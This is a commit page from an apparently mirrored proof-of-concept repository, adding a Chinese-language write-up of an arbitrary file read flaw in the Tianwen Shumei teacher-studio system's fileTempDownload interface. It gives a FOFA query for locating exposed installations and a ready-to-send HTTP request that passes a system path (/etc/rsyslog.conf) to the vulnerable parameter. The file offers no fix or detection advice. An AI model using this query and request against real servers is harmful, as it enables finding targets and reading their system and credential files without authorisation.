mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-06-20 18:01:14 +00:00
Create 天闻数媒名师工作室系统fileTempDownload任意文件读取.md
This commit is contained in:
parent
0e4b03cb1c
commit
6db42c1bef
16
wpoc/天闻数媒名师工作室系统/天闻数媒名师工作室系统fileTempDownload任意文件读取.md
Normal file
16
wpoc/天闻数媒名师工作室系统/天闻数媒名师工作室系统fileTempDownload任意文件读取.md
Normal file
@ -0,0 +1,16 @@
|
|||||||
|
# 天闻数媒名师工作室系统fileTempDownload任意文件读取
|
||||||
|
|
||||||
|
# 一、漏洞简介
|
||||||
|
天闻数媒名师工作室系统fileTempDownload接口存在任意文件读取漏洞
|
||||||
|
|
||||||
|
# 二、影响版本
|
||||||
|
+ 天闻数媒名师工作室系统
|
||||||
|
|
||||||
|
# 三、资产测绘
|
||||||
|
+ fofa`body="/static/js/bootstrap/bootstrap.css" && title="名师工作室"`
|
||||||
|
|
||||||
|
# 四、漏洞复现
|
||||||
|
```plain
|
||||||
|
GET /fileUploadAndDownload/fileTempDownload?path=/etc/rsyslog.conf HTTP/1.1
|
||||||
|
Host: 127.0.0.1:8080
|
||||||
|
```
|
Loading…
x
Reference in New Issue
Block a user